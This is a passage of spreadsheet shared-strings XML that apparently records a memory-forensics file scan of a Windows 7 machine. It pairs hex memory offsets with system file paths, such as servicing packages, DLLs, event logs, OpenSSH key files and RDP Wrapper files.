  </si>
  <si>
    <t>S~6.1.7600.16</t>
  </si>
  <si>
    <t>0xde80bdb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_137_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde80c520</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2719857~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde80c850</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_136_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde80c908</t>
  </si>
  <si>
    <t>S~6.1.7601.17</t>
  </si>
  <si>
    <t>514.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde80cdb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB976422~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde80d038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB4486563_RTM~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde80d3c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2868038_SP1~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde80d6f8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_47_for_KB2893519~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde80d7b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2868038~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde80dae0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_140_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde80db98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB2719857~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde80df80</t>
  </si>
  <si>
    <t>0xde80e180</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3133977~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde80e238</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2862335~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde80e620</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2862335_SP1~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde80ead0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2862335~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde80ee00</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Common-Drivers-Package~31bf3856ad364e35~x86~en-U</t>
  </si>
  <si>
    <t>0xde80eeb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2868038~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde80f298</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2807986~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde80f680</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2800095~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde80fa68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2800095_SP1~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde80fe50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2800095~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8101d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2807986~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8105b8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2807986_SP1~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8107b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_135_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8109b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_78_for_KB2893519~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde810a68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_6_for_KB2807986~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde810d98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3133977_RTM~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde810e50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2807986_RTM~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde811240</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_138_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde811628</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB2532531~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8118d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3092601_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde811c00</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2647753~31bf3856ad364e35~x86~~6.1.4.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde811cb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3092601~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde811f80</t>
  </si>
  <si>
    <t>0xde8122b8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3127220~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde812370</t>
  </si>
  <si>
    <t>0xde812560</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3108381_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde812978</t>
  </si>
  <si>
    <t>0xde812a30</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3108381~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde812ec8</t>
  </si>
  <si>
    <t>0xde812f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_30_for_KB2871997~31bf3856ad364e35~x86~~6.1.2.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde813ca8</t>
  </si>
  <si>
    <t>\Windows\System32\spfileq.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8144a0</t>
  </si>
  <si>
    <t>\Program Files\OpenSSH\etc\ssh_host_ecdsa_key.pub_x001B_[0K</t>
  </si>
  <si>
    <t>0xde814960</t>
  </si>
  <si>
    <t>0xde814a18</t>
  </si>
  <si>
    <t>\Program Files\OpenSSH\etc\ssh_host_dsa_key.pub_x001B_[0K</t>
  </si>
  <si>
    <t>0xde815290</t>
  </si>
  <si>
    <t>\Program Files\OpenSSH\var\run\sshd.pid_x001B_[0K</t>
  </si>
  <si>
    <t>0xde815830</t>
  </si>
  <si>
    <t>0xde8159e8</t>
  </si>
  <si>
    <t>0xde816dc0</t>
  </si>
  <si>
    <t>\Windows\System32\wbem\wmiutils.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8182e0</t>
  </si>
  <si>
    <t>0xde818af0</t>
  </si>
  <si>
    <t>\Windows\System32\wbem\Repository\MAPPING2.MAP_x001B_[0K</t>
  </si>
  <si>
    <t>0xde818eb8</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\etc\hosts_x001B_[0K</t>
  </si>
  <si>
    <t>0xde819b10</t>
  </si>
  <si>
    <t>\Windows\System32\wbem\Repository\INDEX.BTR_x001B_[0K</t>
  </si>
  <si>
    <t>0xde819bc8</t>
  </si>
  <si>
    <t>0xde819d48</t>
  </si>
  <si>
    <t>\Windows\System32\wbem\Repository\OBJECTS.DATA_x001B_[0K</t>
  </si>
  <si>
    <t>0xde819e00</t>
  </si>
  <si>
    <t>\Users\Wilfred\Favorites_x001B_[0K</t>
  </si>
  <si>
    <t>0xde819f80</t>
  </si>
  <si>
    <t>\Windows\System32\wbem\Repository\MAPPING3.MAP_x001B_[0K</t>
  </si>
  <si>
    <t>0xde81b490</t>
  </si>
  <si>
    <t>\srvsvc_x001B_[0K</t>
  </si>
  <si>
    <t>0xde81c280</t>
  </si>
  <si>
    <t>\Windows\System32\rasadhlp.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde81de68</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Microsoft-Windows-Dhcp-Client%4Admin.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xde81e1c8</t>
  </si>
  <si>
    <t>0xde81e420</t>
  </si>
  <si>
    <t>\Winsock2\CatalogChangeListener-1d0-0_x001B_[0K</t>
  </si>
  <si>
    <t>0xde81e588</t>
  </si>
  <si>
    <t>0xde81f2a0</t>
  </si>
  <si>
    <t>0xde81f788</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_usbhub_0000_1bec33bb3c8ba8f4.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8272e0</t>
  </si>
  <si>
    <t>\Windows\System32\ncobjapi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8275d0</t>
  </si>
  <si>
    <t>\Windows\System32\wbem\wbemess.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde827780</t>
  </si>
  <si>
    <t>\Windows\System32\wbem\WmiPrvSD.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8299d0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\ff9b8e0bfa2821d13a113701d3f6</t>
  </si>
  <si>
    <t>d613\System.W</t>
  </si>
  <si>
    <t>0xde829a88</t>
  </si>
  <si>
    <t>\Windows\servicing\CbsMsg.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde82a0e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3086255~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde82a1a0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2640148_SP1~31bf3856ad364e35~x86~~6.1.2.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde82b4c8</t>
  </si>
  <si>
    <t>0xde82b580</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xde82c1f8</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\SMSvcHost\3.0.0.0__b03f5f7f11d50a3a\SMSvcHost.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xde82f038</t>
  </si>
  <si>
    <t>\Windows\System32\regsvr32.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xde82f9d0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_32\PresentationCore\v4.0_4.0.0.0__31bf3856ad364e35\Present</t>
  </si>
  <si>
    <t>ationCore.dll</t>
  </si>
  <si>
    <t>0xde82fbf0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP5A1F.tmp\System.Configuration.Install.dll</t>
  </si>
  <si>
    <t>0xde82fda0</t>
  </si>
  <si>
    <t>\Windows\System32\rascfg.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde82ff80</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\fusion.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde830470</t>
  </si>
  <si>
    <t>0xde8305a8</t>
  </si>
  <si>
    <t>0xde8309a8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\netprofm.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde831270</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms.DataVisualization.Design\v4.0_4.</t>
  </si>
  <si>
    <t>0.0.0__31bf38</t>
  </si>
  <si>
    <t>56ad364e35\</t>
  </si>
  <si>
    <t>.Windows.Forms.DataVisualization.Design.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde833878</t>
  </si>
  <si>
    <t>0xde834590</t>
  </si>
  <si>
    <t>0xde835260</t>
  </si>
  <si>
    <t>0xde835c28</t>
  </si>
  <si>
    <t>0xde835ce0</t>
  </si>
  <si>
    <t>0xde8362c0</t>
  </si>
  <si>
    <t>0xde836b00</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firew</t>
  </si>
  <si>
    <t>all.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xde837ad0</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Microsoft-Windows-NCSI%4Operational.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xde838538</t>
  </si>
  <si>
    <t>\Windows\winsxs\x86_usbport.inf_31bf3856ad364e35_6.1.7601.23933_none_c03c9e297afea36d\usbport.</t>
  </si>
  <si>
    <t>0xde8395f0</t>
  </si>
  <si>
    <t>\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Windows\WindowsUpdate.log_x001B_[0K</t>
  </si>
  <si>
    <t>0xde839840</t>
  </si>
  <si>
    <t>0xde839b98</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde839da8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP596B.tmp\System.ServiceProcess.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde83bec8</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\UIAutomationTypes\3.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll_x001B_[</t>
  </si>
  <si>
    <t>0xde83c500</t>
  </si>
  <si>
    <t>\Windows\System32\dxgi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde83d028</t>
  </si>
  <si>
    <t>\System Volume Information\Syscache.hve.LOG2_x001B_[0K</t>
  </si>
  <si>
    <t>0xde83d1e8</t>
  </si>
  <si>
    <t>\Windows\System32\PortableDeviceApi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde83e630</t>
  </si>
  <si>
    <t>\Windows\System32\PortableDeviceConnectApi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde83ec98</t>
  </si>
  <si>
    <t>\Windows\System32\drvstore.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde83fe60</t>
  </si>
  <si>
    <t>\Windows\System32\aelupsvc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde83ff18</t>
  </si>
  <si>
    <t>\Windows\System32\perftrack.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde840110</t>
  </si>
  <si>
    <t>0xde840278</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.</t>
  </si>
  <si>
    <t>Dynamic.dll_x001B_[</t>
  </si>
  <si>
    <t>0xde8406a8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB4483458~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde842440</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\SystemIndex.3.C</t>
  </si>
  <si>
    <t>rwl_x001B_[0K</t>
  </si>
  <si>
    <t>0xde844830</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\System.Messaging\1475e1cdec1c89c35024_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8448e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Sessions\Sessions.xml_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8451e0</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\ieframe.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xde845680</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\Help-DataLayer.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xde845880</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp_x001B_[0K</t>
  </si>
  <si>
    <t>0xde845938</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\LDDMCore.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xde845b20</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\HealthCenterInstrumentation.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xde846400</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\en-US\AMDAGP.SYS.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde846550</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\en-US\SISAGP.SYS.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde846670</t>
  </si>
  <si>
    <t>0xde846950</t>
  </si>
  <si>
    <t>\Windows\AppCompat\Programs\RecentFileCache.bcf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde848c98</t>
  </si>
  <si>
    <t>\Program Files\RDP Wrapper\rdpwrap.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde848e40</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\aitagent.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde84a130</t>
  </si>
  <si>
    <t>0xde84a698</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\comdlg32.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xde84aad0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_149_for_KB2758857~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde84ab88</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\dhcpcore6.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde84ae20</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.Commands.GetDiagInput\6.1.0.0__31bf3856</t>
  </si>
  <si>
    <t>ad364e35\Micr</t>
  </si>
  <si>
    <t>osoft.Windo</t>
  </si>
  <si>
    <t>ws.Dia</t>
  </si>
  <si>
    <t>gnosis.Commands.GetDiagInput.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde84b2d0</t>
  </si>
  <si>
    <t>\Windows\System32\wpdbusenum.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde84b5d0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationNative_v0400.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde84be00</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\p2psvc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde84bf80</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\netcfgx.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde84c3a0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\KernelBase.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde84cba0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Printing\0803782b5d9fd55d065015a9f619563c\</t>
  </si>
  <si>
    <t>System.Printi</t>
  </si>
  <si>
    <t>ng.ni.dll_x001B_[</t>
  </si>
  <si>
    <t>0xde84ead8</t>
  </si>
  <si>
    <t>\Windows\System32\FXSMON.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde84eec8</t>
  </si>
  <si>
    <t>0xde84ef80</t>
  </si>
  <si>
    <t>\Windows\System32\spp\tokens\ppdlic\appid-ppdlic.xrm-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde84f568</t>
  </si>
  <si>
    <t>\System Volume Information\Syscache.hve_x001B_[0K</t>
  </si>
  <si>
    <t>0xde84f610</t>
  </si>
  <si>
    <t>\System Volume Information\Syscache.hve.LOG1_x001B_[0K</t>
  </si>
  <si>
    <t>0xde84f930</t>
  </si>
  <si>
    <t>0xde850728</t>
  </si>
  <si>
    <t>\Windows\System32\IPSECSVC.DLL_x001B_[0K</t>
  </si>
  <si>
    <t>0xde850898</t>
  </si>
  <si>
    <t>\Program Files\RDP Wrapper\rdpwrap.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xde850f80</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows Defender\Definition Updates\{14D578D3-E515-496E-B4B4-9FA983C17D</t>
  </si>
  <si>
    <t>70}\mpasbase.</t>
  </si>
  <si>
    <t>vdm_x001B_[0K</t>
  </si>
  <si>
    <t>0xde851420</t>
  </si>
  <si>
    <t>\Windows\System32\Apphlpdm.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8515d0</t>
  </si>
  <si>
    <t>\Windows\System32\icaapi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde851dd0</t>
  </si>
  <si>
    <t>\Windows\System32\termsrv.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde852278</t>
  </si>
  <si>
    <t>\Windows\System32\diagperf.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde852c38</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\en-US\ohci1394.sys.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8533d8</t>
  </si>
  <si>
    <t>0xde853490</t>
  </si>
  <si>
    <t>0xde8535e0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\en-US\faxcn002.inf_loc_x001B_[0K</t>
  </si>
  <si>
    <t>0xde855320</t>
  </si>
  <si>
    <t>0xde856a78</t>
  </si>
  <si>
    <t>\Windows\System32\spp\tokens\ppdlic\WMPPlayer-ppdlic.xrm-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde856d58</t>
  </si>
  <si>
    <t>\Windows\System32\spp\tokens\ppdlic\TabletPCPlatformInput-core-ppdlic.xrm-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde856f80</t>
  </si>
  <si>
    <t>\Windows\System32\nshhttp.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde857c30</t>
  </si>
  <si>
    <t>\Windows\System32\browcli.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8581f0</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Mobility Center.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8583a0</t>
  </si>
  <si>
    <t>0xde85ad28</t>
  </si>
  <si>
    <t>\Windows\System32\wuaueng.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde85bf80</t>
  </si>
  <si>
    <t>527E5F_BB601A</t>
  </si>
  <si>
    <t>101E2DCDBEB</t>
  </si>
  <si>
    <t>A415F4</t>
  </si>
  <si>
    <t>D672E68F5_x001B_[0K</t>
  </si>
  <si>
    <t>0xde85c300</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_4_for_KB2479943~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde85c630</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_5_for_KB2937610~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde85c6e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2479943_RTM~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde85cae0</t>
  </si>
  <si>
    <t>0xde85cb98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2479943~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde85cf80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2479943_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde85d2a8</t>
  </si>
  <si>
    <t>0xde85d360</t>
  </si>
  <si>
    <t>0xde85d748</t>
  </si>
  <si>
    <t>0xde85db30</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2579686_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde85de60</t>
  </si>
  <si>
    <t>0xde85df18</t>
  </si>
  <si>
    <t>0xde85e590</t>
  </si>
  <si>
    <t>0xde85ee60</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_30_for_KB2908783~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde85ef18</t>
  </si>
  <si>
    <t>0xde85f038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2698365_RTM~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde85f130</t>
  </si>
  <si>
    <t>0xde85f460</t>
  </si>
  <si>
    <t>0xde85f518</t>
  </si>
  <si>
    <t>0xde85f900</t>
  </si>
  <si>
    <t>0xde85fce8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_11_for_KB2698365~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde85ff80</t>
  </si>
  <si>
    <t>0xde860038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_129_for_KB3172605~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde860448</t>
  </si>
  <si>
    <t>0xde860830</t>
  </si>
  <si>
    <t>0xde860c18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2727528_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde861248</t>
  </si>
  <si>
    <t>0xde861300</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_146_for_KB2758857~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8616e8</t>
  </si>
  <si>
    <t>0xde861a18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_56_for_KB2871997~31bf3856ad364e35~x86~~6.1.2.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde861ad0</t>
  </si>
  <si>
    <t>0xde861e00</t>
  </si>
  <si>
    <t>0xde861eb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB2727528~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde862370</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_434_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde862428</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3179573_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde862758</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-WinOcr-Package~31bf3856ad364e35~x86~en-US~6.1.76</t>
  </si>
  <si>
    <t>0xde862810</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3179573~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde862b30</t>
  </si>
  <si>
    <t>0xde862e60</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_80_for_KB3172605~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde862f18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2758857_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8631e0</t>
  </si>
  <si>
    <t>0xde863298</t>
  </si>
  <si>
